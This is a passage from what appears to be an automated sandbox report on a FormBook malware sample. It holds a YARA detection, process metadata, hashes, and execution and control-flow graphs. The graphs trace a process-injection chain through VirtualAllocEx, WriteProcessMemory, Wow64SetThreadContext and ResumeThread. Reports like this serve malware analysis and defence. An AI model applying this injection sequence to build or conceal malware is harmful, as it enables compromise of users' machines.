                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4469698131.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:11
                                                                                  Start time:19:25:24
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff79f9e0000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:11.2%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:3.7%
                                                                                    Total number of Nodes:460
                                                                                    Total number of Limit Nodes:32
                                                                                    execution_graph 68669 58b9a68 68670 58b9a73 68669->68670 68673 58b5338 68670->68673 68672 58b9a7e 68674 58b5343 68673->68674 68676 58b9ed5 68674->68676 68677 58b9a98 68674->68677 68676->68672 68676->68676 68678 58b9aa3 68677->68678 68681 58ba4e4 68678->68681 68680 58baa7f 68682 58ba4ef 68681->68682 68683 58ba694 2 API calls 68682->68683 68684 58bbf1f 68683->68684 68684->68680 68373 76c1e48 68374 76c1e57 68373->68374 68375 76c1e76 68374->68375 68378 76c1f38 68374->68378 68382 76c1f48 68374->68382 68379 76c1f56 68378->68379 68380 76c1f61 KiUserCallbackDispatcher 68379->68380 68381 76c1f6a 68379->68381 68380->68381 68381->68375 68383 76c1f56 68382->68383 68384 76c1f61 KiUserCallbackDispatcher 68383->68384 68385 76c1f6a 68383->68385 68384->68385 68385->68375 68386 52cf888 68392 52cca10 68386->68392 68389 52cf9d5 68391 52cf8cb 68401 52cca50 68392->68401 68406 52cca40 68392->68406 68393 52cca2e 68393->68391 68396 52ccad0 68393->68396 68398 52ccaf1 68396->68398 68397 52ccb06 68397->68389 68398->68397 68399 52cb1a8 DrawTextExW 68398->68399 68400 52ccb71 68399->68400 68402 52cca81 68401->68402 68403 52ccaae 68402->68403 68405 52ccad0 DrawTextExW 68402->68405 68411 52ccac0 68402->68411 68403->68393 68405->68403 68407 52cca50 68406->68407 68408 52ccaae 68407->68408 68409 52ccac0 DrawTextExW 68407->68409 68410 52ccad0 DrawTextExW 68407->68410 68408->68393 68409->68408 68410->68408 68413 52ccad0 68411->68413 68412 52ccb06 68412->68403 68413->68412 68416 52cb1a8 68413->68416 68415 52ccb71 68418 52cb1b3 68416->68418 68417 52ceb49 68417->68415 68418->68417 68422 52cf6c0 68418->68422 68425 52cf6b0 68418->68425 68419 52cec5c 68419->68415 68429 52ce114 68422->68429 68426 52cf6c0 68425->68426 68427 52ce114 DrawTextExW 68426->68427 68428 52cf6dd 68427->68428 68428->68419 68430 52cf6f8 DrawTextExW 68429->68430 68432 52cf6dd 68430->68432 68432->68419 68503 52cb968 68507 52cb9a0 68503->68507 68511 52cb990 68503->68511 68504 52cb987 68508 52cb9a9 68507->68508 68515 52cb9d9 68508->68515 68509 52cb9ce 68509->68504 68512 52cb9a0 68511->68512 68514 52cb9d9 DrawTextExW 68512->68514 68513 52cb9ce 68513->68504 68514->68513 68516 52cba23 68515->68516 68517 52cba12 68515->68517 68518 52cbab1 68516->68518 68521 52cbd00 68516->68521 68526 52cbd10 68516->68526 68517->68509 68518->68509 68522 52cbd10 68521->68522 68523 52cbe3e 68522->68523 68531 52cc598 68522->68531 68536 52cc5a8 68522->68536 68523->68517 68527 52cbd38 68526->68527 68528 52cbe3e 68527->68528 68529 52cc5a8 DrawTextExW 68527->68529 68530 52cc598 DrawTextExW 68527->68530 68528->68517 68529->68528 68530->68528 68532 52cc5a8 68531->68532 68535 52cca10 DrawTextExW 68532->68535 68541 52cca00 68532->68541 68533 52cc634 68533->68523 68535->68533 68537 52cc5be 68536->68537 68539 52cca00 DrawTextExW 68537->68539 68540 52cca10 DrawTextExW 68537->68540 68538 52cc634 68538->68523 68539->68538 68540->68538 68542 52cca10 68541->68542 68544 52cca40 DrawTextExW 68542->68544 68545 52cca50 DrawTextExW 68542->68545 68543 52cca2e 68543->68533 68544->68543 68545->68543 68433 be660c0 68434 be66104 68433->68434 68435 be6610e EnumThreadWindows 68433->68435 68434->68435 68436 be66140 68435->68436 68546 be645a0 68547 be645a3 68546->68547 68548 be649a0 68547->68548 68549 be6a8d0 3 API calls 68547->68549 68550 be6a8c1 3 API calls 68547->68550 68549->68548 68550->68548 68115 58bbf00 68116 58bbf10 68115->68116 68119 58ba694 68116->68119 68120 58ba69f 68119->68120 68123 1395d9c 68120->68123 68124 1395da7 68123->68124 68126 13989eb 68124->68126 68130 139ac93 68124->68130 68125 1398a29 68126->68125 68134 139cd80 68126->68134 68139 139cd90 68126->68139 68144 139b0c0 68130->68144 68148 139b0d0 68130->68148 68131 139aca6 68131->68126 68135 139cdb1 68134->68135 68136 139cdd5 68135->68136 68156 139d339 68135->68156 68160 139d348 68135->68160 68136->68125 68140 139cdb1 68139->68140 68141 139cdd5 68140->68141 68142 139d339 2 API calls 68140->68142 68143 139d348 2 API calls 68140->68143 68141->68125 68142->68141 68143->68141 68145 139b0cd 68144->68145 68146 139b0df 68145->68146 68151 139b1c8 68145->68151 68146->68131 68150 139b1c8 GetModuleHandleW 68148->68150 68149 139b0df 68149->68131 68150->68149 68152 139b1d9 68151->68152 68153 139b1fc 68151->68153 68152->68153 68154 139b400 GetModuleHandleW 68152->68154 68153->68146 68155 139b42d 68154->68155 68155->68146 68157 139d348 68156->68157 68158 139d38f 68157->68158 68164 139d170 68157->68164 68158->68136 68161 139d355 68160->68161 68162 139d38f 68161->68162 68163 139d170 2 API calls 68161->68163 68162->68136 68163->68162 68165 139d17b 68164->68165 68167 139dca0 68165->68167 68168 139d28c 68165->68168 68167->68167 68169 139d297 68168->68169 68170 1395d9c 2 API calls 68169->68170 68171 139dd0f 68170->68171 68172 139dd1e 68171->68172 68174 139e190 68171->68174 68172->68167 68176 139e1be 68174->68176 68175 139e28f 68176->68175 68177 139e28a KiUserCallbackDispatcher 68176->68177 68177->68175 68437 58bd220 68438 58bd265 GetClassInfoW 68437->68438 68440 58bd2ab 68438->68440 68551 58bd140 68552 58bd188 SetWindowTextW 68551->68552 68553 58bd182 68551->68553 68554 58bd1b9 68552->68554 68553->68552 68555 58b7b40 68556 58b7b73 68555->68556 68557 58b7be1 68556->68557 68559 58b7eca 68556->68559 68560 58b7f43 68559->68560 68561 58b7ed2 68559->68561 68562 58b7f5e ResumeThread 68560->68562 68561->68557 68563 52c5560 68565 52c558d 68563->68565 68564 52c55dc 68564->68564 68565->68564 68567 52c4ed4 68565->68567 68568 52c4edf 68567->68568 68569 52c4e78 SetTimer 68568->68569 68570 52c5745 68569->68570 68570->68564 68685 be6c88b 68686 be6c89e 68685->68686 68690 be6cac8 PostMessageW 68686->68690 68692 be6caa0 68686->68692 68687 be6c8c1 68691 be6cb34 68690->68691 68691->68687 68693 be6caa4 68692->68693 68694 be6caac 68692->68694 68693->68694 68695 be6cacf PostMessageW 68693->68695 68694->68687 68696 be6cb34 68695->68696 68696->68687 68571 be666a8 68572 be666e1 68571->68572 68573 be66937 68572->68573 68576 58bf5f8 68572->68576 68580 58bf5e8 68572->68580 68578 58bf60b 68576->68578 68577 58bf60f 68577->68573 68578->68577 68579 58bf662 KiUserCallbackDispatcher 68578->68579 68579->68577 68581 58bf60b 68580->68581 68582 58bf60f 68581->68582 68583 58bf662 KiUserCallbackDispatcher 68581->68583 68582->68573 68583->68582 68584 be66da8 68585 be66dc1 68584->68585 68587 be66dcb 68584->68587 68585->68587 68588 be65278 68585->68588 68590 be65283 68588->68590 68592 be66b78 68590->68592 68591 be683aa 68591->68587 68594 be66b83 68592->68594 68593 be68436 68593->68591 68594->68593 68595 be66bc8 KiUserCallbackDispatcher 68594->68595 68595->68593 68596 be69d28 68598 be69d2b 68596->68598 68597 be69dab 68598->68597 68599 be66bc8 KiUserCallbackDispatcher 68598->68599 68600 be69da4 68599->68600 68601 1394668 68602 139467a 68601->68602 68603 1394686 68602->68603 68607 1394783 68602->68607 68612 1394204 68603->68612 68605 13946a5 68608 139479d 68607->68608 68616 139487f 68608->68616 68620 1394888 68608->68620 68609 13947a7 68609->68603 68613 139420f 68612->68613 68628 1395d1c 68613->68628 68615 13970a3 68615->68605 68617 13948af 68616->68617 68618 139498c 68617->68618 68624 13944e4 68617->68624 68618->68609 68622 13948af 68620->68622 68621 139498c 68621->68609 68622->68621 68623 13944e4 CreateActCtxA 68622->68623 68623->68621 68625 1395918 CreateActCtxA 68624->68625 68627 13959db 68625->68627 68629 1395d27 68628->68629 68632 1395d3c 68629->68632 68631 13972a5 68631->68615 68633 1395d47 68632->68633 68636 1395d6c 68633->68636 68635 1397382 68635->68631 68637 1395d77 68636->68637 68638 1395d9c 2 API calls 68637->68638 68639 1397485 68638->68639 68639->68635 68178 58b8e19 68183 76c70e8 68178->68183 68200 76c70a8 68178->68200 68217 76c714e 68178->68217 68179 58b8c54 68184 76c7102 68183->68184 68185 76c710a 68184->68185 68235 76c79b9 68184->68235 68239 76c7904 68184->68239 68243 76c75c0 68184->68243 68250 76c77ea 68184->68250 68254 76c7864 68184->68254 68259 76c7e8c 68184->68259 68263 76c78cc 68184->68263 68267 76c7f37 68184->68267 68271 76c7b53 68184->68271 68276 76c77b4 68184->68276 68280 76c7715 68184->68280 68284 76c795a 68184->68284 68289 76c7974 68184->68289 68293 76c7a23 68184->68293 68185->68179 68201 76c70dc 68200->68201 68202 76c7e8c 2 API calls 68201->68202 68203 76c78cc ResumeThread 68201->68203 68204 76c77ea ResumeThread 68201->68204 68205 76c7864 2 API calls 68201->68205 68206 76c7904 2 API calls 68201->68206 68207 76c75c0 4 API calls 68201->68207 68208 76c7a23 2 API calls 68201->68208 68209 76c79b9 2 API calls 68201->68209 68210 76c795a 2 API calls 68201->68210 68211 76c7974 2 API calls 68201->68211 68212 76c710a 68201->68212 68213 76c77b4 2 API calls 68201->68213 68214 76c7715 2 API calls 68201->68214 68215 76c7f37 2 API calls 68201->68215 68216 76c7b53 2 API calls 68201->68216 68202->68212 68203->68212 68204->68212 68205->68212 68206->68212 68207->68212 68208->68212 68209->68212 68210->68212 68211->68212 68212->68179 68213->68212 68214->68212 68215->68212 68216->68212 68218 76c70dc 68217->68218 68220 76c7151 68217->68220 68219 76c710a 68218->68219 68221 76c7e8c 2 API calls 68218->68221 68222 76c78cc ResumeThread 68218->68222 68223 76c77ea ResumeThread 68218->68223 68224 76c7864 2 API calls 68218->68224 68225 76c7904 2 API calls 68218->68225 68226 76c75c0 4 API calls 68218->68226 68227 76c7a23 2 API calls 68218->68227 68228 76c79b9 2 API calls 68218->68228 68229 76c795a 2 API calls 68218->68229 68230 76c7974 2 API calls 68218->68230 68231 76c77b4 2 API calls 68218->68231 68232 76c7715 2 API calls 68218->68232 68233 76c7f37 2 API calls 68218->68233 68234 76c7b53 2 API calls 68218->68234 68219->68179 68220->68179 68221->68219 68222->68219 68223->68219 68224->68219 68225->68219 68226->68219 68227->68219 68228->68219 68229->68219 68230->68219 68231->68219 68232->68219 68233->68219 68234->68219 68236 76c7911 68235->68236 68298 58b84e8 68236->68298 68302 58b84f0 68236->68302 68240 76c7923 68239->68240 68241 58b84e8 VirtualAllocEx 68240->68241 68242 58b84f0 VirtualAllocEx 68240->68242 68241->68240 68242->68240 68244 76c75c6 68243->68244 68306 58b882e 68244->68306 68310 58b8838 68244->68310 68251 76c77f0 68250->68251 68314 58b7f5e 68251->68314 68255 76c786a 68254->68255 68256 76c7d15 68255->68256 68318 58b8698 68255->68318 68322 58b86a0 68255->68322 68256->68185 68326 58b7fd8 68259->68326 68330 58b7fe0 68259->68330 68260 76c7a5c 68260->68259 68264 76c7801 68263->68264 68265 76c76aa 68263->68265 68266 58b7f5e ResumeThread 68264->68266 68265->68185 68266->68265 68268 76c7a5c 68267->68268 68269 58b7fd8 Wow64SetThreadContext 68268->68269 68270 58b7fe0 Wow64SetThreadContext 68268->68270 68269->68268 68270->68268 68272 76c7b5c 68271->68272 68334 58b85b0 68272->68334 68338 58b85a8 68272->68338 68273 76c7fd3 68277 76c77cb 68276->68277 68278 58b84e8 VirtualAllocEx 68277->68278 68279 58b84f0 VirtualAllocEx 68277->68279 68278->68277 68279->68277 68282 58b85a8 WriteProcessMemory 68280->68282 68283 58b85b0 WriteProcessMemory 68280->68283 68281 76c7743 68281->68185 68282->68281 68283->68281 68285 76c7967 68284->68285 68287 58b85a8 WriteProcessMemory 68285->68287 68288 58b85b0 WriteProcessMemory 68285->68288 68286 76c7ac1 68287->68286 68288->68286 68291 58b7fd8 Wow64SetThreadContext 68289->68291 68292 58b7fe0 Wow64SetThreadContext 68289->68292 68290 76c798e 68291->68290 68292->68290 68295 76c787b 68293->68295 68294 76c7d15 68294->68185 68295->68294 68296 58b8698 ReadProcessMemory 68295->68296 68297 58b86a0 ReadProcessMemory 68295->68297 68296->68295 68297->68295 68299 58b854c VirtualAllocEx 68298->68299 68301 58b84eb 68298->68301 68300 58b856d 68299->68300 68300->68236 68301->68299 68303 58b8530 VirtualAllocEx 68302->68303 68305 58b856d 68303->68305 68305->68236 68307 58b88c1 68306->68307 68307->68307 68308 58b8a26 CreateProcessA 68307->68308 68309 58b8a83 68308->68309 68311 58b88c1 68310->68311 68311->68311 68312 58b8a26 CreateProcessA 68311->68312 68313 58b8a83 68312->68313 68315 58b7f70 ResumeThread 68314->68315 68317 58b7fa1 68315->68317 68317->68185 68319 58b86a0 ReadProcessMemory 68318->68319 68321 58b872f 68319->68321 68321->68255 68323 58b86eb ReadProcessMemory 68322->68323 68325 58b872f 68323->68325 68325->68255 68327 58b7fe0 Wow64SetThreadContext 68326->68327 68329 58b806d 68327->68329 68329->68260 68331 58b8025 Wow64SetThreadContext 68330->68331 68333 58b806d 68331->68333 68333->68260 68335 58b85f8 WriteProcessMemory 68334->68335 68337 58b864f 68335->68337 68337->68273 68339 58b85b0 WriteProcessMemory 68338->68339 68341 58b864f 68339->68341 68341->68273 68342 52c51b8 68344 52c51e6 68342->68344 68343 52c5271 68343->68343 68344->68343 68346 52c4e78 68344->68346 68347 52c4e83 68346->68347 68349 52c5378 68347->68349 68350 52c4ea8 68347->68350 68349->68343 68351 52c54c0 SetTimer 68350->68351 68352 52c552c 68351->68352 68352->68349 68640 76c82b8 68641 76c8478 68640->68641 68643 76c82de 68640->68643 68642 76c8443 68642->68642 68643->68642 68645 be66abc PostMessageW 68643->68645 68647 be679a8 68643->68647 68650 be66ab0 68643->68650 68645->68643 68648 be679b0 PostMessageW 68647->68648 68649 be67a1c 68648->68649 68649->68643 68651 be66ab5 PostMessageW 68650->68651 68653 be67a1c 68651->68653 68653->68643 68654 139d460 68655 139d4a6 68654->68655 68659 139d630 68655->68659 68663 139d640 68655->68663 68656 139d593 68660 139d640 68659->68660 68666 139b0b4 68660->68666 68664 139b0b4 DuplicateHandle 68663->68664 68665 139d66e 68664->68665 68665->68656 68667 139d6a8 DuplicateHandle 68666->68667 68668 139d66e 68667->68668 68668->68656 68353 bfa0660 68355 bfa0672 68353->68355 68354 bfa078d 68355->68354 68358 be66bc8 68355->68358 68362 be692e0 68355->68362 68360 be66bd3 68358->68360 68359 be693ae 68359->68354 68360->68359 68361 be693ac KiUserCallbackDispatcher 68360->68361 68361->68359 68364 be692e5 68362->68364 68363 be693ae 68363->68354 68364->68363 68365 be693ac KiUserCallbackDispatcher 68364->68365 68365->68363 68366 be67978 68367 be67988 68366->68367 68370 be66abc 68367->68370 68371 be679b0 PostMessageW 68370->68371 68372 be67999 68371->68372 68441 be64ed8 68443 be64edb 68441->68443 68445 be633e4 68443->68445 68446 be633ef 68445->68446 68447 be65587 68446->68447 68448 be655c1 68446->68448 68453 be643b6 68446->68453 68458 be643e8 68446->68458 68447->68448 68463 bfa1391 68447->68463 68469 bfa13a0 68447->68469 68454 be643fc 68453->68454 68475 be6a8d0 68453->68475 68484 be6a8c1 68453->68484 68493 be6abcf 68453->68493 68454->68447 68460 be6a8d0 3 API calls 68458->68460 68461 be6a8c1 3 API calls 68458->68461 68462 be6abcf KiUserCallbackDispatcher 68458->68462 68459 be643fc 68459->68447 68460->68459 68461->68459 68462->68459 68464 bfa1394 68463->68464 68466 bfa02c8 PeekMessageW 68464->68466 68468 bfa1452 68464->68468 68497 bfa02e0 68464->68497 68500 bfa0314 68464->68500 68466->68464 68468->68448 68473 bfa13a3 68469->68473 68470 bfa02c8 PeekMessageW 68470->68473 68471 bfa02e0 KiUserCallbackDispatcher 68471->68473 68472 bfa1452 68472->68448 68473->68470 68473->68471 68473->68472 68474 bfa0314 DispatchMessageW 68473->68474 68474->68473 68477 be6a8d3 68475->68477 68476 be6a90a 68476->68454 68477->68476 68482 be6aa45 68477->68482 68483 139e190 KiUserCallbackDispatcher 68477->68483 68478 be6abc9 68478->68454 68479 be6a9f5 68480 be66abc PostMessageW 68479->68480 68479->68482 68480->68482 68481 be66bc8 KiUserCallbackDispatcher 68481->68478 68482->68478 68482->68481 68483->68479 68486 be6a8c4 68484->68486 68485 be6a90a 68485->68454 68486->68485 68491 be6aa45 68486->68491 68492 139e190 KiUserCallbackDispatcher 68486->68492 68487 be6abc9 68487->68454 68488 be6a9f5 68489 be66abc PostMessageW 68488->68489 68488->68491 68489->68491 68490 be66bc8 KiUserCallbackDispatcher 68490->68487 68491->68487 68491->68490 68492->68488 68496 be6ab4b 68493->68496 68494 be6abc9 68494->68454 68495 be66bc8 KiUserCallbackDispatcher 68495->68494 68496->68494 68496->68495 68498 bfa1d08 KiUserCallbackDispatcher 68497->68498 68499 bfa1d7c 68498->68499 68499->68464 68501 bfa21e0 DispatchMessageW 68500->68501 68502 bfa224c 68501->68502 68502->68464

                                                                                    Executed Functions

                                                                                    Function 0BE645A0 Relevance: 3.1, Strings: 2, Instructions: 552COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 539 be645a0-be64605 541 be64aed-be64b56 539->541 542 be6460b-be64618 539->542 546 be64b5d-be64bb4 541->546 545 be6461e-be64628 542->545 542->546 550 be6462e-be64638 545->550 551 be64bbb-be64c12 545->551 546->551 553 be6463e-be64648 550->553 554 be64c19-be64c70 550->554 551->554 557 be64c77-be64cd4 553->557 558 be6464e-be64655 553->558 554->557 567 be64cdb-be64d49 557->567 558->567 568 be6465b-be6465f 558->568 625 be64d51-be64d53 567->625 626 be64d4b-be64d4f 567->626 572 be646b6-be6470a call be632c8 call be632d8 568->572 573 be64661-be64696 568->573 602 be64713-be64721 572->602 603 be6470c-be64712 572->603 573->572 596 be64698-be646a7 573->596 596->572 605 be646a9-be646b3 call be632b8 596->605 608 be64723-be64748 call be632e8 602->608 609 be6474d-be64782 602->609 603->602 605->572 608->609 620 be64784-be6478a 609->620 621 be6478b-be6479c 609->621 620->621 623 be6479e-be647a9 621->623 624 be647ab 621->624 628 be647ae-be647e0 623->628 624->628 629 be64d58-be64d66 625->629 626->629 635 be647f5-be64818 628->635 636 be647e2-be647e8 628->636 641 be648e0-be648ea 635->641 642 be6481e-be64828 635->642 636->635 637 be647ea-be647f0 call be632f4 636->637 637->635 643 be648f5-be64918 641->643 644 be648ec-be648ef call be64db7 641->644 642->641 647 be6482e-be64861 642->647 650 be64920-be6492e 643->650 651 be6491a-be6491d 643->651 644->643 654 be64867-be648d6 647->654 655 be64a33-be64ac3 call be632f4 647->655 656 be64964-be64972 650->656 657 be64930-be6493e 650->657 651->650 654->641 655->541 662 be64974-be64982 656->662 663 be64990-be64997 656->663 657->656 664 be64940-be64962 call be63304 657->664 662->663 671 be64984-be6498b call be63304 662->671 704 be6499d call be6a8d0 663->704 705 be6499d call be6a8c1 663->705 664->663 669 be649a0-be649b0 677 be64a05-be64a14 669->677 678 be649b2-be649bc 669->678 671->663 677->655 682 be649be-be649d1 call be63310 678->682 683 be649fa-be649ff 678->683 682->683 690 be649d3-be649f5 call be63320 682->690 700 be64a02 call 76c4208 683->700 701 be64a02 call 76c41f8 683->701 702 be64a02 call 76c4484 683->702 690->683 700->677 701->677 702->677 704->669 705->669
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Hgq$Hgq
                                                                                    • API String ID: 0-3391890871
                                                                                    • Opcode ID: 88beb33c3cbd8016b7b4bec39d52d0c4c319a61e1a9ec6c298e13b73b4d2cd8a
                                                                                    • Instruction ID: 48a92becd1e5595401189241bf7779fe001827609a7ea98de72653a50c901c71
                                                                                    • Opcode Fuzzy Hash: 88beb33c3cbd8016b7b4bec39d52d0c4c319a61e1a9ec6c298e13b73b4d2cd8a
                                                                                    • Instruction Fuzzy Hash: 44226D70B402198FDB54EFB9C4946AEBBF2AF89340F248569D505EB391DF34AD42CB50
                                                                                    Function 058B9A98 Relevance: 1.8, Strings: 1, Instructions: 555COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 841 58b9a98-58baaa3 call 58ba4d4 call 58ba4e4 870 58baaa9-58bac6f call 58ba4f4 * 19 841->870 871 58bac75-58bac8e 841->871 870->871 875 58bad2f-58bad52 871->875 876 58bac94-58bacb3 871->876 889 58badd8-58badea 875->889 890 58bad58-58bad6a 875->890 887 58bace6-58bad2a 876->887 888 58bacb5-58bace1 876->888 908 58bae3e-58bae48 887->908 888->908 898 58badec-58badf2 889->898 899 58badf4 889->899 900 58bad6c-58bad72 890->900 901 58bad74 890->901 904 58badfa-58bae38 898->904 899->904 906 58bad7a-58badd6 900->906 901->906 904->908 906->908 910 58bae4a-58bae61 908->910 911 58bae67-58bae79 908->911 910->911 922 58bae7b-58baed4 911->922 923 58baed6-58baeff 911->923 945 58baf0d-58baf5e 922->945 1028 58baf01 call 58bc918 923->1028 1029 58baf01 call 58bc928 923->1029 1030 58baf01 call 58bc980 923->1030 942 58baf07 942->945 965 58baf60-58baf75 945->965 966 58baf77-58baf85 945->966 971 58baf8c-58bb093 965->971 966->971 993 58bb099-58bb0a5 971->993 994 58bb210-58bb223 971->994 995 58bb0ab-58bb0dd 993->995 996 58bb225 993->996 997 58bb22a-58bb22f 994->997 1003 58bb163-58bb20a 995->1003 1004 58bb0e3-58bb0f2 995->1004 996->997 1001 58bb230 997->1001 1001->1001 1003->993 1003->994 1004->1003 1007 58bb0f4-58bb12d 1004->1007 1007->1003 1018 58bb12f-58bb142 1007->1018 1025 58bb14a-58bb159 1018->1025 1025->1003 1028->942 1029->942 1030->942
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LRcq
                                                                                    • API String ID: 0-4134321033
                                                                                    • Opcode ID: d1693ad7b7d4b3ae90ea819731aae24c009f8e768a55a952fff7d9a9d166cda3
                                                                                    • Instruction ID: 2e44b55f53e2667475b858e3c81df2801f308e51843fea6b73f68891a54ed1c6
                                                                                    • Opcode Fuzzy Hash: d1693ad7b7d4b3ae90ea819731aae24c009f8e768a55a952fff7d9a9d166cda3
                                                                                    • Instruction Fuzzy Hash: 06321B74B002198FDB58DB28C858BEE77B6AF88700F1485A8D50D9B3A5DF745D82CF91
                                                                                    Function 058BB59E Relevance: 1.8, Strings: 1, Instructions: 538COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1031 58bb59e-58bb67b call 58ba524 call 58ba534 call 58ba544 call 58ba554 call 58ba564 call 58ba574 call 58ba584 call 58ba594 1050 58bb67d 1031->1050 1051 58bb680-58bb697 1031->1051 1050->1051 1052 58bb699 1051->1052 1053 58bb69c-58bb6ea 1051->1053 1052->1053 1056 58bb6ef-58bb709 1053->1056 1057 58bb6ec 1053->1057 1058 58bb70b 1056->1058 1059 58bb70e-58bb766 call 58ba5a4 1056->1059 1057->1056 1058->1059 1065 58bb7a8-58bb7c4 call 58ba5b4 1059->1065 1066 58bb768-58bb78e call 58ba5b4 call 58ba5c4 1059->1066 1071 58bb7c9-58bb7d3 call 58ba5c4 1065->1071 1076 58bb7d8-58bb85b 1066->1076 1071->1076 1081 58bb85d 1076->1081 1082 58bb860-58bba64 call 58ba5d4 * 4 1076->1082 1081->1082 1111 58bba6a-58bbb1e call 58ba5e4 call 58ba5f4 call 58ba5e4 call 58ba5f4 1082->1111 1112 58bbbc5-58bbbff 1082->1112 1160 58bbb4e-58bbb92 call 58ba614 1111->1160 1161 58bbb20-58bbb49 call 58ba604 * 2 1111->1161 1113 58bbc63-58bbd9e call 58ba634 call 58ba644 call 58ba654 call 58ba664 call 58ba674 1112->1113 1114 58bbc01-58bbc0a 1112->1114 1167 58bbdcc-58bbdd3 1113->1167 1168 58bbda0-58bbdc7 call 58ba684 1113->1168 1116 58bbc10-58bbc61 1114->1116 1117 58bbdd4-58bbe6f 1114->1117 1116->1113 1116->1114 1170 58bbb97-58bbbc0 call 58ba624 1160->1170 1161->1160 1168->1167 1170->1112
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'cq
                                                                                    • API String ID: 0-182294849
                                                                                    • Opcode ID: 726800e940e812bb57feae72cb11f4d7400cd87b8512adf1cd9fbbd581333711
                                                                                    • Instruction ID: d2739f8e034f3a3e26c8d6d486eac88b5a2d6d51ef986f0b3f1bf04b337d93e5
                                                                                    • Opcode Fuzzy Hash: 726800e940e812bb57feae72cb11f4d7400cd87b8512adf1cd9fbbd581333711
                                                                                    • Instruction Fuzzy Hash: 23421674B002188FDB18DB68C999BE9B7F2FF89700F1541E9D909AB361CA31AD81CF51
                                                                                    Function 076C5870 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1352 76c5870-76c5885 1354 76c588c-76c588e 1352->1354 1355 76c5887-76c588b 1352->1355 1356 76c5899-76c58be 1354->1356 1357 76c5890-76c5897 1354->1357 1365 76c58c9-76c58db 1356->1365 1366 76c58c0-76c58c4 call 76c2ebc 1356->1366 1357->1356 1358 76c58f2-76c596a 1357->1358 1376 76c5d1a-76c5d1f 1358->1376 1377 76c5970-76c59ab 1358->1377 1370 76c58dd-76c58e1 call 76c2ecc 1365->1370 1371 76c58e6-76c58f1 1365->1371 1366->1365 1370->1371 1378 76c5d29-76c5d3c 1376->1378 1379 76c5d21-76c5d23 1376->1379 1386 76c59ad-76c59b7 1377->1386 1387 76c59be-76c59de 1377->1387 1383 76c5d42-76c5d49 1378->1383 1379->1378 1386->1387 1389 76c59e0-76c59ea 1387->1389 1390 76c59f1-76c5a11 1387->1390 1389->1390 1392 76c5a24-76c5a44 1390->1392 1393 76c5a13-76c5a1d 1390->1393 1395 76c5a46-76c5a50 1392->1395 1396 76c5a57-76c5a60 call 76c2f10 1392->1396 1393->1392 1395->1396 1399 76c5a84-76c5a8d 1396->1399 1400 76c5a62-76c5a7d call 76c2f10 1396->1400 1404 76c5a8f-76c5aaa 1399->1404 1405 76c5ab1-76c5aba call 76c4844 1399->1405 1400->1399 1404->1405 1410 76c5abc-76c5ac0 call 76c4854 1405->1410 1411 76c5ac5-76c5ae1 1405->1411 1410->1411 1415 76c5af9-76c5afd 1411->1415 1416 76c5ae3-76c5ae9 1411->1416 1419 76c5aff-76c5b10 call 76c2ebc 1415->1419 1420 76c5b17-76c5b5f 1415->1420 1417 76c5aed-76c5aef 1416->1417 1418 76c5aeb 1416->1418 1417->1415 1418->1415 1419->1420 1426 76c5b61 1420->1426 1427 76c5b83-76c5b8a 1420->1427 1428 76c5b64-76c5b6a 1426->1428 1429 76c5b8c-76c5b9b 1427->1429 1430 76c5ba1-76c5baf 1427->1430 1431 76c5d4a-76c5d88 1428->1431 1432 76c5b70-76c5b76 1428->1432 1429->1430 1438 76c5bb9-76c5bbc 1430->1438 1439 76c5bb1-76c5bb3 1430->1439 1433 76c5b78-76c5b7a 1432->1433 1434 76c5b80-76c5b81 1432->1434 1433->1434 1434->1427 1434->1428 1441 76c5bc4-76c5be3 1438->1441 1439->1438 1444 76c5be5-76c5bf3 1441->1444 1445 76c5c10-76c5c2c 1441->1445 1444->1445 1448 76c5bf5-76c5c09 1444->1448 1449 76c5c2e-76c5c38 1445->1449 1450 76c5c3f-76c5c66 call 76c4864 1445->1450 1448->1445 1449->1450 1455 76c5c7e-76c5c82 1450->1455 1456 76c5c68-76c5c6e 1450->1456 1459 